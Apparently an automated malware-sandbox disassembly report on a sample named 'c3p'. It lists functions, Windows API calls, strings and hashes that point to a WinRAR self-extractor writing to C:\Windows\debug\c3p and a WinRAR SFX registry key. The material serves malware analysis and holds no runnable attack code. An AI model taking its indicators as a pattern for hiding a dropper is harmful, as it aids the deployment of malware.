Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcslen$AllocateHeap_malloc_wcscat_wcscpy
String ID: }
API String ID: 2020890722-4239843852
Opcode ID: 5be53b1095a2ab32973f25b929dcd562014003380e9720f1ab8d773318b69248
Instruction ID: 4ace2659f0a71f1c0e491d0e6fa7231a35ce44d2916887e281e468eea389b305
Opcode Fuzzy Hash: 5be53b1095a2ab32973f25b929dcd562014003380e9720f1ab8d773318b69248
Instruction Fuzzy Hash: F611E431E0131A19E721AAE48885BEF73A8DF10354F50087BE644E22D1EBBDA998865D

Function 0040D77D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D740: _wcscpy.LIBCMT ref: 0040D745

RegCreateKeyExW.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000000,00000000,00020006,00000000,?,?,C:\Windows\debug\c3p), ref: 0040D7CA
_wcslen.LIBCMT ref: 0040D7D8
RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 0040D7F3
RegCloseKey.ADVAPI32(?), ref: 0040D7FC

Strings

Software\WinRAR SFX, xrefs: 0040D7C0
C:\Windows\debug\c3p, xrefs: 0040D795, 0040D79F

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: CloseCreateValue_wcscpy_wcslen
String ID: C:\Windows\debug\c3p$Software\WinRAR SFX
API String ID: 3170333323-119503857
Opcode ID: 100d00995d6a63fed18b24ca57a222256744f2a12b12eff38f0e8fa4f2736368
Instruction ID: 0765010bb5bb6a0fe0cb384e36732af2640db4f3dedf99eb0a1494b53b81d458
Opcode Fuzzy Hash: 100d00995d6a63fed18b24ca57a222256744f2a12b12eff38f0e8fa4f2736368
Instruction Fuzzy Hash: D4014476900118FFEB21AF90DC86EDA7B6CEB04348F508077B90562061D7B45ED99669

Function 0040CBA9 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CC01,00000020,?,?,00405CD9,?,00000020,00000001,00000000,?,00000010,?,?,?), ref: 0040CBB7
GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CBD0
GetProcAddress.KERNEL32(00437800,CryptUnprotectMemory), ref: 0040CBDC

Strings

CryptUnprotectMemory, xrefs: 0040CBD2
Crypt32.dll, xrefs: 0040CBB2
CryptProtectMemory, xrefs: 0040CBCA

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2238633743-1753850145
Opcode ID: 48996cf74afa82a78abaf954274bd4a0a105598b289ae600398f177971e3c7d5
Instruction ID: e0a478e82edebb696e3797d723582699ec8f98af1c0d384b4f87605a5cb2363b
Opcode Fuzzy Hash: 48996cf74afa82a78abaf954274bd4a0a105598b289ae600398f177971e3c7d5
Instruction Fuzzy Hash: C8E09230A043119FD7315F39A844B02FBE85FA0B10B55842FE984E3250C6B8E4518B1D

Function 0041D945 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 0041D96D

Part of subcall function 00419F54: __getptd.LIBCMT ref: 00419F62
Part of subcall function 00419F54: __getptd.LIBCMT ref: 00419F70

__getptd.LIBCMT ref: 0041D977

Part of subcall function 0041E574: __getptd_noexit.LIBCMT ref: 0041E577
Part of subcall function 0041E574: __amsg_exit.LIBCMT ref: 0041E584

__getptd.LIBCMT ref: 0041D985
__getptd.LIBCMT ref: 0041D993
__getptd.LIBCMT ref: 0041D99E
_CallCatchBlock2.LIBCMT ref: 0041D9C4

Part of subcall function 00419FF9: __CallSettingFrame@12.LIBCMT ref: 0041A045

Part of subcall function 0041DA6B: __getptd.LIBCMT ref: 0041DA7A
Part of subcall function 0041DA6B: __getptd.LIBCMT ref: 0041DA88

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 1319808b816f433426a306ed37f8bcc874ecca95cd1a94e5b102af76d65134e0
Instruction ID: 0d1fdc40dcef433c7a3beecf315455fe806531323c29dc7904bac809b21f9e77
Opcode Fuzzy Hash: 1319808b816f433426a306ed37f8bcc874ecca95cd1a94e5b102af76d65134e0
Instruction Fuzzy Hash: 3911F6B5D00209EFDF00EFA5C445AED7BB1FF04318F10816AF814A7261DB789A959F59

Function 0040D33C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

CharUpperW.USER32(?,?,?,?,00000400), ref: 0040D39D
CharUpperW.USER32(?,?,?,?,?,00000400), ref: 0040D3C4

Strings

z(D, xrefs: 0040D410
-, xrefs: 0040D387

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: CharUpper
String ID: -$z(D
API String ID: 9403516-2779374180
Opcode ID: 763a059b28972daa6675efbfd6814a5cbc540f44e41c08162a8b73d0ca034a6a
Instruction ID: 5a54b2b3934ec182270bd062ae1b5f3cde0699911e7ab2a93cdf09677cf63997
Opcode Fuzzy Hash: 763a059b28972daa6675efbfd6814a5cbc540f44e41c08162a8b73d0ca034a6a
Instruction Fuzzy Hash: A821C5B6C0411995DB207FE58D087BB66A8EB41344F048077E648B22D6DABCDECDCB9D

Function 00406633 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00406638

Part of subcall function 00402C53: __EH_prolog.LIBCMT ref: 00402C58

SetFileSecurityW.ADVAPI32(00000000,00000007,?,?,?,?,00000000,00000000,00406CD8,00000000,?,?,004074FE,?,?,?), ref: 004066C0
SetFileSecurityW.ADVAPI32(?,00000007,?,00000000,?,00000800,?,004074FE,?,?,?,?,?,00000000,0040812E,?), ref: 004066E7

Strings

SeSecurityPrivilege, xrefs: 0040667B
SeRestorePrivilege, xrefs: 00406690

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: FileH_prologSecurity
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 2167059215-639343689
Opcode ID: 816d8b300ecf00b65235d1b3f1cf75912b99fde73c87ba82d4faddb76ed9a496
Instruction ID: f1eaae1a436dcc63bac7601fe0c36cac3f9c6a8270284a771d117db77c86062f
Opcode Fuzzy Hash: 816d8b300ecf00b65235d1b3f1cf75912b99fde73c87ba82d4faddb76ed9a496
Instruction Fuzzy Hash: 0B21A271900259BADF21AF55DC02BAF7B789B44758F01403FB901B72C1C7BD4AA58BAE

Function 0040DEA3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040DED9
DialogBoxParamW.USER32(GETPASSWORD1,?,0040D168,?,?), ref: 0040DF1D

Strings

GETPASSWORD1, xrefs: 0040DF12
z(D, xrefs: 0040DEBF
z(D, xrefs: 0040DF5B

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: DialogParamVisibleWindow
String ID: GETPASSWORD1$z(D$z(D
API String ID: 3157717868-2824312538
Opcode ID: e88bfb975fa668df6f26be9bfa6701e2b4952b75b555e6c140b16e96fe307322
Instruction ID: 4bdba699b0cca12474fd478aacd32274d4dad6070e46267843f5fb06d984f06e
Opcode Fuzzy Hash: e88bfb975fa668df6f26be9bfa6701e2b4952b75b555e6c140b16e96fe307322
Instruction Fuzzy Hash: 40117B31A002446BDB21DFB1EC40B973B94AB09758F18403AFE046B2C1D7BC8C54C7AD

Function 0040D0DF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 0040D122
GetDlgItemTextW.USER32(?,00000066,00000800), ref: 0040D138
SetDlgItemTextW.USER32(?,00000065,?), ref: 0040D152
SetDlgItemTextW.USER32(?,00000066), ref: 0040D15D

Strings

RENAMEDLG, xrefs: 0040D0EE

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ItemText$Dialog
String ID: RENAMEDLG
API String ID: 1770891597-3299779563
Opcode ID: 78691bb5986986e1fad7ee9e0b639972e60ad6be3bb22d1630eaa8e4794c8191
Instruction ID: f2e528411abd1e2b3e8593656d3951f5635f610e8c61cee0b2dae6604748a801
Opcode Fuzzy Hash: 78691bb5986986e1fad7ee9e0b639972e60ad6be3bb22d1630eaa8e4794c8191
Instruction Fuzzy Hash: E9017932640118B7DA215F945C01FBB3B25EB4AB50F500036FA05BA1D0CB7AD866976D

Function 00405ED9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00405EDE
_memset.LIBCMT ref: 00405F41
_memset.LIBCMT ref: 00405F4D
_memset.LIBCMT ref: 00405F6B

Strings

;p, xrefs: 00405EE7, 00405F03

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _memset$H_prolog
String ID: ;p
API String ID: 3013590873-2290485912
Opcode ID: 56f5045b953efce44012e87429a48b7a75cd4b5515e354ad5193a0fccdbc02f6
Instruction ID: 6084a19cc8fdac2cea8eb5380dac8fcce9e222b4eeefd413346753ef4e8476ca
Opcode Fuzzy Hash: 56f5045b953efce44012e87429a48b7a75cd4b5515e354ad5193a0fccdbc02f6
Instruction Fuzzy Hash: 3901B9B0781750BAD220AB668C87FDFBAACDF86B08F00401FB659B61C1C7FC1540866E

Function 0041D694 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041D6AE

Part of subcall function 0041E574: __getptd_noexit.LIBCMT ref: 0041E577
Part of subcall function 0041E574: __amsg_exit.LIBCMT ref: 0041E584

__getptd.LIBCMT ref: 0041D6BF
__getptd.LIBCMT ref: 0041D6CD

Strings

MOC, xrefs: 0041D6A0
csm, xrefs: 0041D6A7

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: ff76af2ab1f2bc655f60c8d28124db9f091a0a07b538bc98cf4441336e04e070
Instruction ID: 4ed4d8d9f0948e0be74688b0f2660ef1f140c4f6cdc82f78e24e21987bad1007
Opcode Fuzzy Hash: ff76af2ab1f2bc655f60c8d28124db9f091a0a07b538bc98cf4441336e04e070
Instruction Fuzzy Hash: 87E04F79D101049FC710ABAAC046BA93796EB45318F5A05E7E80DCB322EB3CD8D0994F

Function 00421767 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00421773

Part of subcall function 0041E574: __getptd_noexit.LIBCMT ref: 0041E577
Part of subcall function 0041E574: __amsg_exit.LIBCMT ref: 0041E584

__amsg_exit.LIBCMT ref: 00421793
__lock.LIBCMT ref: 004217A3
InterlockedDecrement.KERNEL32(?), ref: 004217C0
InterlockedIncrement.KERNEL32(021F16B8), ref: 004217EB

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 1904c64c2f7eb9a1631b0ee597ecde1b4678e3411cd0d16de502b8f6a8bd21bc
Instruction ID: 63fb1741bdd88e79933145aa06474b73bff8dbe6d40a874fa99982fb7391d8e1
Opcode Fuzzy Hash: 1904c64c2f7eb9a1631b0ee597ecde1b4678e3411cd0d16de502b8f6a8bd21bc
Instruction Fuzzy Hash: B3018E35F01625ABDB20AF66A40575A7770BF94764FD0012BE800A76A0CB3C6992CBDE

Function 00411A07 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00411A0F
_wcslen.LIBCMT ref: 00411A20
_wcslen.LIBCMT ref: 00411A30
_wcslen.LIBCMT ref: 00411A3E
CompareStringW.KERNEL32(00000400,00001001,?,?,00000000,?,?,00000000,?,00409CE8,__rar_,00000000,00000006,00000000,?,?), ref: 00411A5B

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcslen$CompareString
String ID:
API String ID: 3397213944-0
Opcode ID: 0c79ced954745f2c5e0e0d879718ba40a26046ad7cbdf73da099a7014804b54d
Instruction ID: a9558cc59323643d2d9cfd89e177e1ae6c05d6f9270a3c92a284dfa939f321ac
Opcode Fuzzy Hash: 0c79ced954745f2c5e0e0d879718ba40a26046ad7cbdf73da099a7014804b54d
Instruction Fuzzy Hash: B4F0B432249058BFDF126F92EC01DDE3F1ADF413B8F245027FE2589060D63588B29799

Function 0041632B Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00416330

Part of subcall function 00412571: _realloc.LIBCMT ref: 004125C9

Part of subcall function 0041A41A: _malloc.LIBCMT ref: 0041A434

_memset.LIBCMT ref: 00416580
_memset.LIBCMT ref: 0041673A

Strings

, xrefs: 0041651C

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _memset$H_prolog_malloc_realloc
String ID:
API String ID: 1826288403-3916222277
Opcode ID: f9c8cb6b05ddb76e8548eeb2d1ac3ea54b8cf3ba8c174f49064645aa04d130e2
Instruction ID: e6e62932246ad9cc85acb2fdef4fd174b94dd1b142c26c02803cf8505e01ba38
Opcode Fuzzy Hash: f9c8cb6b05ddb76e8548eeb2d1ac3ea54b8cf3ba8c174f49064645aa04d130e2
Instruction Fuzzy Hash: 95E1C271A00755AFDB10DF65C880BEEB7B1FF14308F15492EE826A7281DB79E891CB49

Function 004186BB Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 222COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 004187A4
_wcscpy.LIBCMT ref: 00418804
_wcscpy.LIBCMT ref: 004188AB

Strings

T, xrefs: 0041886D

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: _wcscpy
String ID: T
API String ID: 3048848545-3187964512
Opcode ID: ca89c477607d7b183aac38426e97101888d983e4494ee7729fb40aa10065e44c
Instruction ID: 1a64791ecf6c394d75ade218f1bd7adc46ae4bf97b91eb71da31d361fe9c082b
Opcode Fuzzy Hash: ca89c477607d7b183aac38426e97101888d983e4494ee7729fb40aa10065e44c
Instruction Fuzzy Hash: 2A910C71600644AFDF24DF64C844BEAB7F8AF04314F14456FE99997282CB78A9C4CF65

Function 00406B09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00406B0E
_wcscpy.LIBCMT ref: 00406B44
SetFileTime.KERNEL32(?,?,?,?,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000), ref: 00406C64

Strings

:, xrefs: 00406B73

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: FileH_prologTime_wcscpy
String ID: :
API String ID: 26009825-336475711
Opcode ID: 4237846a2648132caf2513631f94b8e86ff27be91d244c51fb8acdc38b2addb1
Instruction ID: 5c255cd2950383439117d9559028b553a344d07193c18407302b7e13fe35cf44
Opcode Fuzzy Hash: 4237846a2648132caf2513631f94b8e86ff27be91d244c51fb8acdc38b2addb1
Instruction Fuzzy Hash: 0B41A571805118AAEB20EB61DC95EDE737CAF05348F0040AFB556B31C1DB786F89CE69

Function 0040D22F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 0040D2AF
GetDlgItemTextW.USER32(?,00000065,?,?), ref: 0040D2C4
SetDlgItemTextW.USER32(?,00000065,?), ref: 0040D2D9

Strings

ASKNEXTVOL, xrefs: 0040D23E

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_c3p.jbxd

Similarity

API ID: ItemText$Dialog
String ID: ASKNEXTVOL
API String ID: 1770891597-3402441367
Opcode ID: 15e30dc99aad98673fcf82a25a8af69f2c98eca4f98acdabd84c1cc6367ce671
Instruction ID: 01490f4368d8e2b0c51ca769b2cbfe42fa3a35388a386c9a7bbd6db21a0877e3
Opcode Fuzzy Hash: 15e30dc99aad98673fcf82a25a8af69f2c98eca4f98acdabd84c1cc6367ce671
Instruction Fuzzy Hash: 4E11AC35600108ABDA20AFE49C05F763B65EB0A714F40407AFA05BA1E0C77AD82AAB5D

Function 004120D3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00412144
_memset.LIBCMT ref: 0041214D

Strings

, xrefs: 004120F2

Memory Dump Source

Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
